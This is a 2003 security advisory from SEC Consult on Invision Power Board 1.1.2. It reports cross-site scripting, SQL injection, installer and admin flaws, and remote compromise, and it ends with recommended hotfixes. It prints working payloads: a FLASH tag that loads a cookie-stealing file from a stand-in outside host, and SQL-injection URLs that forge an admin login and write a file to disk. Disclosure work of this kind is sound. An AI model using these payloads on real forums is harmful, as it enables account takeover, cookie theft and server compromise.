Invision Powerboard V.1.1.2 Multiple Vulnerabilities

[11.07.03] Invision Powerboard V.1.1.2 Multiple Vulnerabilities

 

===========================================

Security REPORT Invision Power Board v1.1.2

===========================================

 

Product: Power Board v1.1.2 (maybe earlier Versions)

Vulnerablities: cross site scripting, sql-injection, install- and admin-issues, os-command execution

Vuln.-Classes: Check out www.owasp.org/asac/ for more detailed information on "Attack Components"

Vendor: www.invisionboard.com

Vendor-Status: contacted "info@invisionpower.com" on Jul.11th 2003

Vendor-Patchs: www.invisionboard.com/downloads/chat.zip

 

Exploitable:

Local: ---

Remote: YES

 

============

Introduction

============

 

Visit "http://www.invisionboard.com/" for additional information.

 

=====================

Vulnerability Details

=====================

 

 

1) CROSS-SITE-SCRIPTING

=======================

 

OBJECT:

Post.php

 

DESCRIPTION:

by using [FLASH=h,w][/FLASH]-tags within a posting(Post-textarea) it is possible to execute

arbitrary client-scripts ... thus leading to cookie-theft.

 

the usage of flash tags is allowed per default in "conf_global.php":-

---*---
$INFO['allow_flash'] = '1';
---*---

EXAMPLE-Content:
---*---
hey dude, whats up?
[FLASH=2,2]http:// anotherhost.ext/cookie-thief.swf[/FLASH]
cu,
jonnie
---*---

 

2) SQL-INJECTION

================

 

OBJECT:

ipchat.php

 

DESCRIPTION:

depending on mysql-version and/or drivers it is possible to change the result of sql-queries.

 

 

EXAMPLE(mySql > 4):

---*---

http:// localhost/ibo/ipchat.php?password=1 &username=9x%2527+union+select+ %25271%2527,%2527c4ca4238a0b923820dcc509a6f75849b%2527, %2527admin%2527,1%252f*+

---*---

 

EXAMPLE(with file-permission set):-

---*---
http:// localhost/ibo/ipchat.php?password=1 &username=admin%2527into+outfile+%2527 [fullpath]%2527--+
---*---

 

3) INSTALLER-, ADMIN-ISSUES

===========================

 

if for some reason(permissions, directory-moving) the installer-lockfile(install.lock) is missing, any user can use the "sm_install.php" - script.

 

once administrator .. one is able to:

 

A) execute arbitrary SQL-QUERIES thru "admin.php/act=mysql/code=runsql/query=sq"

B) upload arbitrary files(including programms and scripts) into the "emoticons" directory.

 

.. thus leading to a "total" compromise of the http-servers account.

 

 

=======

Remarks

=======

 

---

 

====================

Recommended Hotfixes

====================

 

disallow flash in "conf_global.php".

check for installer-lockfile.

 

software patch(es).

 

 

EOF Martin Eiszner / @2003WebSec.org

 

 

=======

Contact

=======

 

SEC Consult Unternehmensberatung GmbH / Martin Eiszner

Blindengasse 3

1080 Vienna

 

Austria / EUROPE

 

m dot eiszner at sec-consult dot com

www.sec-consult.com